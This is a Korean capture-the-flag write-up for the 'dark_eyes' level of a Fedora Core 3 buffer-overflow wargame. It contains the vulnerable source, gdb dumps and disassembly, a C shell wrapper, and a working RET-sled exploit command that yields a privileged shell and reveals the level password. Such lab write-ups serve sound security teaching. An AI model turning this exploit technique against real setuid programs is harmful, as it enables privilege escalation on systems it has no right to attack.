

LOB FC3 [iron_golem -> dark_eyes]

[iron_golem@Fedora_1stFloor ~]$ cat dark_eyes.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - dark_eyes

        - Local BOF on Fedora Core 3

        - hint : RET sleding

*/

 

/*
 * main - the dark_eyes challenge program exactly as listed on this page.
 *
 * Behaviour visible in the code: argv[1] is copied with an unbounded
 * strcpy() into a 256-byte stack buffer. The only mitigation present is
 * that the 4 bytes at buffer+264 are saved before the copy and written
 * back afterwards; nothing else in the frame is preserved.
 *
 * NOTE(review): as printed, the listing has no #include lines, so
 * printf, exit, memcpy and strcpy are implicitly declared, and main
 * falls off its end without a return statement.
 */
int main(int argc, char *argv[])

{

        char buffer[256];   /* destination of the unbounded strcpy below */

        char saved_sfp[4];  /* holds the 4 bytes read from buffer+264 */

 

        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }

 

        // save sfp: buffer+264 is 8 bytes past the end of the 256-byte
        // array, i.e. an out-of-bounds read that depends on the compiler's
        // frame layout. In the disassembly further down this page buffer is
        // at [ebp-264], so buffer+264 is the caller's saved frame pointer.
        memcpy(saved_sfp, buffer+264, 4);

 

        // overflow!! -- strcpy has no length bound; any argv[1] longer than
        // 255 bytes writes past the end of buffer into the rest of the frame.
        strcpy(buffer, argv[1]);

 

        // restore sfp: only these 4 bytes are put back. The bytes between
        // buffer[256] and buffer+264, and everything from buffer+268 onward
        // (where this frame's return address sits), stay as strcpy left them.
        memcpy(buffer+264, saved_sfp, 4);

 

        printf("%s\n", buffer);

}

 

소스를 보면, 이전 문제에서 단순히 sfp 변조를 막는 기법이 추가된 코드이다.

이는 febp를 막기 위한 것으로서,

이를 보면 이전처럼 RET sleding을 그대로 사용하면 될 것 같다.

 

 

[iron_golem@Fedora_1stFloor ~]$ cp dark_eyes dark_eye1

[iron_golem@Fedora_1stFloor ~]$ gdb -q dark_eye1

(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) b main

Breakpoint 1 at 0x8048411

(gdb) r

Starting program: /home/iron_golem/dark_eye1

(no debugging symbols found)...(no debugging symbols found)...

Breakpoint 1, 0x08048411 in main ()

(gdb) x/40x $ebp

0xfefaf2f8:     0xfefaf358      0x00730e33      0x00000001      0xfefaf384

0xfefaf308:     0xfefaf38c      0x0070eab6      0x0083eff4      0x00000000

0xfefaf318:     0xfefaf310      0xfefaf358      0xfefaf300      0x00730df5

0xfefaf328:     0x00000000      0x00000000      0x00000000      0x00718fb4

0xfefaf338:     0x00000001      0x08048360      0x00000000      0x0070e9f0

0xfefaf348:     0x0070f340      0x00718fb4      0x00000001      0x08048360

0xfefaf358:     0x00000000      0x08048381      0x08048408      0x00000001

0xfefaf368:     0xfefaf384      0x080484bc      0x08048510      0x0070f340

0xfefaf378:     0xfefaf37c      0x00715e31      0x00000001      0xfefd7bfe

0xfefaf388:     0x00000000      0xfefd7c19      0xfefd7c32      0xfefd7c3d

(gdb) x/x 0x83eff4

0x83eff4 <svcauthsw+712>:       0x0083ed3c

(gdb) quit

The program is running.  Exit anyway? (y or n) y

[iron_golem@Fedora_1stFloor ~]$ cat > sh.c

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

 

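/*
 * main - make the effective uid/gid the real ones, then run /bin/sh.
 *
 * Fix over the original: setreuid()/setregid() results are checked. If
 * either call fails the shell is not started, because it would otherwise
 * run with credentials other than the ones intended (CERT POS37-C).
 * The system() call and its argument are unchanged.
 *
 * Returns 0 after the shell exits, 1 if a credential change fails or
 * system() itself reports failure (-1).
 */
int main(void)
{
        /* same order as the original: uid first, then gid */
        if (setreuid(geteuid(), geteuid()) != 0) {
                perror("setreuid");
                return 1;
        }
        if (setregid(getegid(), getegid()) != 0) {
                perror("setregid");
                return 1;
        }

        /* -1 means the child could not be created; any other status is
         * the shell's own exit status and is not an error here */
        int rc = system("/bin/sh");
        if (rc == -1) {
                perror("system");
                return 1;
        }
        return 0;
}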

[iron_golem@Fedora_1stFloor ~]$ gcc -o sh sh.c

[iron_golem@Fedora_1stFloor ~]$ ln -s sh `perl -e 'print "\x3c\xed\x83\x00"'`

[iron_golem@Fedora_1stFloor ~]$ export PATH=./:$PATH

[iron_golem@Fedora_1stFloor ~]$ gdb -q dark_eye1

(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x08048408 <main+0>:    push   ebp

0x08048409 <main+1>:    mov    ebp,esp

0x0804840b <main+3>:    sub    esp,0x118

0x08048411 <main+9>:    and    esp,0xfffffff0

0x08048414 <main+12>:   mov    eax,0x0

0x08048419 <main+17>:   add    eax,0xf

0x0804841c <main+20>:   add    eax,0xf

0x0804841f <main+23>:   shr    eax,0x4

0x08048422 <main+26>:   shl    eax,0x4

0x08048425 <main+29>:   sub    esp,eax

0x08048427 <main+31>:   cmp    DWORD PTR [ebp+8],0x1

0x0804842b <main+35>:   jg     0x8048447 <main+63>

0x0804842d <main+37>:   sub    esp,0xc

0x08048430 <main+40>:   push   0x804859c

0x08048435 <main+45>:   call   0x8048320 <_init+56>

0x0804843a <main+50>:   add    esp,0x10

0x0804843d <main+53>:   sub    esp,0xc

0x08048440 <main+56>:   push   0x0

0x08048442 <main+58>:   call   0x8048340 <_init+88>

0x08048447 <main+63>:   sub    esp,0x4

0x0804844a <main+66>:   push   0x4

0x0804844c <main+68>:   lea    eax,[ebp-264]

0x08048452 <main+74>:   add    eax,0x108

0x08048457 <main+79>:   push   eax

0x08048458 <main+80>:   lea    eax,[ebp-268]

0x0804845e <main+86>:   push   eax

0x0804845f <main+87>:   call   0x8048330 <_init+72>

0x08048464 <main+92>:   add    esp,0x10

0x08048467 <main+95>:   sub    esp,0x8

0x0804846a <main+98>:   mov    eax,DWORD PTR [ebp+12]

0x0804846d <main+101>:  add    eax,0x4

0x08048470 <main+104>:  push   DWORD PTR [eax]

0x08048472 <main+106>:  lea    eax,[ebp-264]

---Type <return> to continue, or q <return> to quit---

0x08048478 <main+112>:  push   eax

0x08048479 <main+113>:  call   0x8048350 <_init+104>

0x0804847e <main+118>:  add    esp,0x10

0x08048481 <main+121>:  sub    esp,0x4

0x08048484 <main+124>:  push   0x4

0x08048486 <main+126>:  lea    eax,[ebp-268]

0x0804848c <main+132>:  push   eax

0x0804848d <main+133>:  lea    eax,[ebp-264]

0x08048493 <main+139>:  add    eax,0x108

0x08048498 <main+144>:  push   eax

0x08048499 <main+145>:  call   0x8048330 <_init+72>

0x0804849e <main+150>:  add    esp,0x10

0x080484a1 <main+153>:  sub    esp,0x8

0x080484a4 <main+156>:  lea    eax,[ebp-264]

0x080484aa <main+162>:  push   eax

0x080484ab <main+163>:  push   0x80485a8

0x080484b0 <main+168>:  call   0x8048320 <_init+56>

0x080484b5 <main+173>:  add    esp,0x10

0x080484b8 <main+176>:  leave

0x080484b9 <main+177>:  ret   //ret 주소 확인

0x080484ba <main+178>:  nop

0x080484bb <main+179>:  nop

End of assembler dump.

(gdb) quit

[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes `perl -e 'print "a"x268,"\xb9\x84\x04\x08"x3,"\x90\x54\x7a\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa(Jðþ¹¹¹Tz

sh-3.00$ id

uid=502(dark_eyes) gid=502(dark_eyes) groups=501(iron_golem) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 502

because of you